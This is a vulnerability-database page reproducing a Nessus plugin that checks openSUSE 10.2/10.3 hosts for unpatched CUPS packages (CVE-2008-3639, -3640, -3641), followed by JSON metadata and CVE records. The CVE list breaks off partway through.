Search...

openSUSE 10 Security Update : cups (cups-5652)

2008-10-07T00:00:00

ID SUSE_CUPS-5652.NASL
Type nessus
Reporter This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.
Modified 2008-10-07T00:00:00

Description

Specially crafted print jobs could trigger buffer overflows in the 'imagetops', 'texttops' and 'hpgltops' filters. Attackers could potentially exploit that to execute arbitrary code on the cups server (CVE-2008-3639, CVE-2008-3640, CVE-2008-3641).

                                        
                                            #%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from openSUSE Security Update cups-5652.
#
# The text description of this plugin is (C) SUSE LLC.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(34358);
  script_version("1.12");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/14");

  script_cve_id("CVE-2008-3639", "CVE-2008-3640", "CVE-2008-3641");

  script_name(english:"openSUSE 10 Security Update : cups (cups-5652)");
  script_summary(english:"Check for the cups-5652 patch");

  script_set_attribute(
    attribute:"synopsis", 
    value:"The remote openSUSE host is missing a security update."
  );
  script_set_attribute(
    attribute:"description", 
    value:
"Specially crafted print jobs could trigger buffer overflows in the
'imagetops', 'texttops' and 'hpgltops' filters. Attackers could
potentially exploit that to execute arbitrary code on the cups server
(CVE-2008-3639, CVE-2008-3640, CVE-2008-3641)."
  );
  script_set_attribute(attribute:"solution", value:"Update the affected cups packages.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_cwe_id(119, 189, 399);

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:cups");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:cups-client");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:cups-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:cups-libs");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:cups-libs-32bit");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:10.2");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:10.3");

  script_set_attribute(attribute:"patch_publication_date", value:"2008/10/02");
  script_set_attribute(attribute:"plugin_publication_date", value:"2008/10/07");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE");
if (release !~ "^(SUSE10\.2|SUSE10\.3)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "10.2 / 10.3", release);
if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

ourarch = get_kb_item("Host/cpu");
if (!ourarch) audit(AUDIT_UNKNOWN_ARCH);
if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch);

flag = 0;

if ( rpm_check(release:"SUSE10.2", reference:"cups-1.2.7-12.19") ) flag++;
if ( rpm_check(release:"SUSE10.2", reference:"cups-client-1.2.7-12.19") ) flag++;
if ( rpm_check(release:"SUSE10.2", reference:"cups-devel-1.2.7-12.19") ) flag++;
if ( rpm_check(release:"SUSE10.2", reference:"cups-libs-1.2.7-12.19") ) flag++;
if ( rpm_check(release:"SUSE10.2", cpu:"x86_64", reference:"cups-libs-32bit-1.2.7-12.19") ) flag++;
if ( rpm_check(release:"SUSE10.3", reference:"cups-1.2.12-22.17") ) flag++;
if ( rpm_check(release:"SUSE10.3", reference:"cups-client-1.2.12-22.17") ) flag++;
if ( rpm_check(release:"SUSE10.3", reference:"cups-devel-1.2.12-22.17") ) flag++;
if ( rpm_check(release:"SUSE10.3", reference:"cups-libs-1.2.12-22.17") ) flag++;
if ( rpm_check(release:"SUSE10.3", cpu:"x86_64", reference:"cups-libs-32bit-1.2.12-22.17") ) flag++;

if (flag)
{
  if (report_verbosity &gt; 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "cups / cups-client / cups-devel / cups-libs / cups-libs-32bit");
}

JSON Vulners Source

Initial Source

{"id": "SUSE_CUPS-5652.NASL", "bulletinFamily": "scanner", "title": "openSUSE 10 Security Update : cups (cups-5652)", "description": "Specially crafted print jobs could trigger buffer overflows in the\n'imagetops', 'texttops' and 'hpgltops' filters. Attackers could\npotentially exploit that to execute arbitrary code on the cups server\n(CVE-2008-3639, CVE-2008-3640, CVE-2008-3641).", "published": "2008-10-07T00:00:00", "modified": "2008-10-07T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/34358", "reporter": "This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.", "references": [], "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "type": "nessus", "lastseen": "2021-01-17T14:43:27", "edition": 25, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-3639", "CVE-2008-3641", "CVE-2008-3640"]}, {"type": "centos", "idList": ["CESA-2008:0937", "CESA-2009:0308"]}, {"type": "freebsd", "idList": ["CE29CE1D-971A-11DD-AB7E-001C2514716C"]}, {"type": "slackware", "idList": ["SSA-2008-312-01"]}, {"type": "oraclelinux", "idList": ["ELSA-2008-0937", "ELSA-2009-0308"]}, {"type": "redhat", "idList": ["RHSA-2009:0308", "RHSA-2008:0937"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1656-1:150C2"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-1656.NASL", "FREEBSD_PKG_CE29CE1D971A11DDAB7E001C2514716C.NASL", "FEDORA_2008-8844.NASL", "SUSE9_12261.NASL", "FEDORA_2008-8801.NASL", "SL_20081010_CUPS_ON_SL3_X.NASL", "SLACKWARE_SSA_2008-312-01.NASL", "SUSE_CUPS-5653.NASL", "SUSE_11_0_CUPS-081002.NASL", "CUPS_1_3_9.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:61805", "OPENVAS:1361412562310880160", "OPENVAS:1361412562310830644", "OPENVAS:880160", "OPENVAS:61862", "OPENVAS:65558", "OPENVAS:870157", "OPENVAS:136141256231065558", "OPENVAS:1361412562310880004", "OPENVAS:1361412562310870157"]}, {"type": "gentoo", "idList": ["GLSA-200812-11"]}, {"type": "ubuntu", "idList": ["USN-656-1"]}, {"type": "fedora", "idList": ["FEDORA:C698B2081FF", "FEDORA:E5CC020896E", "FEDORA:1CF1C208969", "FEDORA:7F2C2208D5A", "FEDORA:5BE0C10F888"]}, {"type": "zdi", "idList": ["ZDI-08-067"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:20690", "SECURITYVULNS:VULN:9351"]}, {"type": "exploitdb", "idList": ["EDB-ID:32470"]}], "modified": "2021-01-17T14:43:27", "rev": 2}, "score": {"value": 8.8, "vector": "NONE", "modified": "2021-01-17T14:43:27", "rev": 2}, "vulnersScore": 8.8}, "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update cups-5652.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34358);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n\n script_name(english:\"openSUSE 10 Security Update : cups (cups-5652)\");\n script_summary(english:\"Check for the cups-5652 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted print jobs could trigger buffer overflows in the\n'imagetops', 'texttops' and 'hpgltops' filters. Attackers could\npotentially exploit that to execute arbitrary code on the cups server\n(CVE-2008-3639, CVE-2008-3640, CVE-2008-3641).\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cups-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.2|SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.2 / 10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.2\", reference:\"cups-1.2.7-12.19\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"cups-client-1.2.7-12.19\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"cups-devel-1.2.7-12.19\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", reference:\"cups-libs-1.2.7-12.19\") ) flag++;\nif ( rpm_check(release:\"SUSE10.2\", cpu:\"x86_64\", reference:\"cups-libs-32bit-1.2.7-12.19\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"cups-1.2.12-22.17\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"cups-client-1.2.12-22.17\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"cups-devel-1.2.12-22.17\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"cups-libs-1.2.12-22.17\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", cpu:\"x86_64\", reference:\"cups-libs-32bit-1.2.12-22.17\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups / cups-client / cups-devel / cups-libs / cups-libs-32bit\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "34358", "cpe": ["cpe:/o:novell:opensuse:10.3", "cpe:/o:novell:opensuse:10.2", "p-cpe:/a:novell:opensuse:cups-libs-32bit", "p-cpe:/a:novell:opensuse:cups", "p-cpe:/a:novell:opensuse:cups-libs", "p-cpe:/a:novell:opensuse:cups-client", "p-cpe:/a:novell:opensuse:cups-devel"], "scheme": null}

{"cve": [{"lastseen": "2021-02-02T05:35:15", "description": "The Hewlett-Packard Graphics Language (HPGL) filter in CUPS before 1.3.9 allows remote attackers to execute arbitrary code via crafted pen width and pen color opcodes that overwrite arbitrary memory.", "edition": 6, "cvss3": {}, "published": "2008-10-10T10:30:00", "title": "CVE-2008-3641", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3641"], "modified": "2018-10-11T20:48:00", "cpe": ["cpe:/a:apple:cups:1.2.7", "cpe:/a:apple:cups:1.2.5", "cpe:/a:apple:cups:1.2.8", "cpe:/a:apple:cups:1.3.5", "cpe:/a:apple:cups:1.1.6-3", "cpe:/a:apple:cups:1.1.16", "cpe:/a:apple:cups:1.1.12", "cpe:/a:apple:cups:1.2", "cpe:/a:apple:cups:1.1.5-2", "cpe:/a:apple:cups:1.3.8", "cpe:/a:apple:cups:1.1.11", "cpe:/a:apple:cups:1.1.21", "cpe:/a:apple:cups:1.1.6-1", "cpe:/a:apple:cups:1.3.1", "cpe:/a:apple:cups:1.1.3", "cpe:/a:apple:cups:1.1.2", "cpe:/a:apple:cups:1.1.1", "cpe:/a:apple:cups:1.3", "cpe:/a:apple:cups:1.1.5", "cpe:/a:apple:cups:1.1", "cpe:/a:apple:cups:1.2.2", "cpe:/a:apple:cups:1.2.1", "cpe:/a:apple:cups:1.2.12", "cpe:/a:apple:cups:1.1.10-1", "cpe:/a:apple:cups:1.2.9", "cpe:/a:apple:cups:1.1.17", "cpe:/a:apple:cups:1.1.9", "cpe:/a:apple:cups:1.2.6", "cpe:/a:apple:cups:1.1.6", "cpe:/a:apple:cups:1.1.19", "cpe:/a:apple:cups:1.1.9-1", "cpe:/a:apple:cups:1.1.20", "cpe:/a:apple:cups:1.3.3", "cpe:/a:apple:cups:1.1.23", "cpe:/a:apple:cups:1.2.10", "cpe:/a:apple:cups:1.3.2", "cpe:/a:apple:cups:1.3.4", "cpe:/a:apple:cups:1.1.8", "cpe:/a:apple:cups:1.3.7", "cpe:/a:apple:cups:1.1.18", "cpe:/a:apple:cups:1.1.6-2", "cpe:/a:apple:cups:1.2.3", "cpe:/a:apple:cups:1.3.0", "cpe:/a:apple:cups:1.1.15", "cpe:/a:apple:cups:1.1.13", "cpe:/a:apple:cups:1.1.5-1", "cpe:/a:apple:cups:1.1.22", "cpe:/a:apple:cups:1.2.4", "cpe:/a:apple:cups:1.1.10", "cpe:/a:apple:cups:1.2.11", "cpe:/a:apple:cups:1.2.0", "cpe:/a:apple:cups:1.3.6", "cpe:/a:apple:cups:1.1.7", "cpe:/a:apple:cups:1.1.4", "cpe:/a:apple:cups:1.1.14"], "id": "CVE-2008-3641", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3641", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apple:cups:1.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.9-1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.19:rc3:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3:b1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.19:rc2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.19:rc4:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:rc2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.19:rc5:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:rc6:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.22:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:rc3:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.6-2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:rc5:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.5-2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.6-1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2:b2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2:rc2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.22:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.6-3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.21:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.19:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.22:rc2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2:b1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.5-1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.23:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.21:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2:rc3:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:rc4:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.23:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.10-1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.21:rc2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:15", "description": "Integer overflow in the WriteProlog function in texttops in CUPS before 1.3.9 allows remote attackers to execute arbitrary code via a crafted PostScript file that triggers a heap-based buffer overflow.", "edition": 6, "cvss3": {}, "published": "2008-10-14T21:10:00", "title": "CVE-2008-3640", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-3640"], "modified": "2018-10-03T21:55:00", "cpe": ["cpe:/a:apple:cups:1.2.7", "cpe:/a:apple:cups:1.2.5", "cpe:/a:apple:cups:1.2.8", "cpe:/a:apple:cups:1.3.5", "cpe:/a:apple:cups:1.1.6-3", "cpe:/a:apple:cups:1.1.16", "cpe:/a:apple:cups:1.1.12", "cpe:/a:apple:cups:1.2", "cpe:/a:apple:cups:1.1.5-2", "cpe:/a:apple:cups:1.3.8", "cpe:/a:apple:cups:1.1.11", "cpe:/a:apple:cups:1.1.21", "cpe:/a:apple:cups:1.1.6-1", "cpe:/a:apple:cups:1.3.1", "cpe:/a:apple:cups:1.1.3", "cpe:/a:apple:cups:1.1.2", "cpe:/a:apple:cups:1.1.1", "cpe:/a:apple:cups:1.3", "cpe:/a:apple:cups:1.1.5", "cpe:/a:apple:cups:1.1", "cpe:/a:apple:cups:1.2.2", "cpe:/a:apple:cups:1.2.1", "cpe:/a:apple:cups:1.2.12", "cpe:/a:apple:cups:1.1.10-1", "cpe:/a:apple:cups:1.2.9", "cpe:/a:apple:cups:1.1.17", "cpe:/a:apple:cups:1.1.9", "cpe:/a:apple:cups:1.2.6", "cpe:/a:apple:cups:1.1.6", "cpe:/a:apple:cups:1.1.19", "cpe:/a:apple:cups:1.1.9-1", "cpe:/a:apple:cups:1.1.20", "cpe:/a:apple:cups:1.3.3", "cpe:/a:apple:cups:1.1.23", "cpe:/a:apple:cups:1.2.10", "cpe:/a:apple:cups:1.3.2", "cpe:/a:apple:cups:1.3.4", "cpe:/a:apple:cups:1.1.8", "cpe:/a:apple:cups:1.3.7", "cpe:/a:apple:cups:1.1.18", "cpe:/a:apple:cups:1.1.6-2", "cpe:/a:apple:cups:1.2.3", "cpe:/a:apple:cups:1.3.0", "cpe:/a:apple:cups:1.1.15", "cpe:/a:apple:cups:1.1.13", "cpe:/a:apple:cups:1.1.5-1", "cpe:/a:apple:cups:1.1.22", "cpe:/a:apple:cups:1.2.4", "cpe:/a:apple:cups:1.1.10", "cpe:/a:apple:cups:1.2.11", "cpe:/a:apple:cups:1.2.0", "cpe:/a:apple:cups:1.3.6", "cpe:/a:apple:cups:1.1.7", "cpe:/a:apple:cups:1.1.4", "cpe:/a:apple:cups:1.1.14"], "id": "CVE-2008-3640", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3640", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apple:cups:1.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.9-1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.19:rc3:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3:b1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.19:rc2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.19:rc4:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:rc2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.19:rc5:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:rc6:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.22:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:rc3:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.6-2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:rc5:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.5-2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.6-1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2:b2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2:rc2:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.22:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.6-3:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.21:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.19:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.20:rc1:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:apple:cups:1.2.2:*:*:*:*:*:*:*", 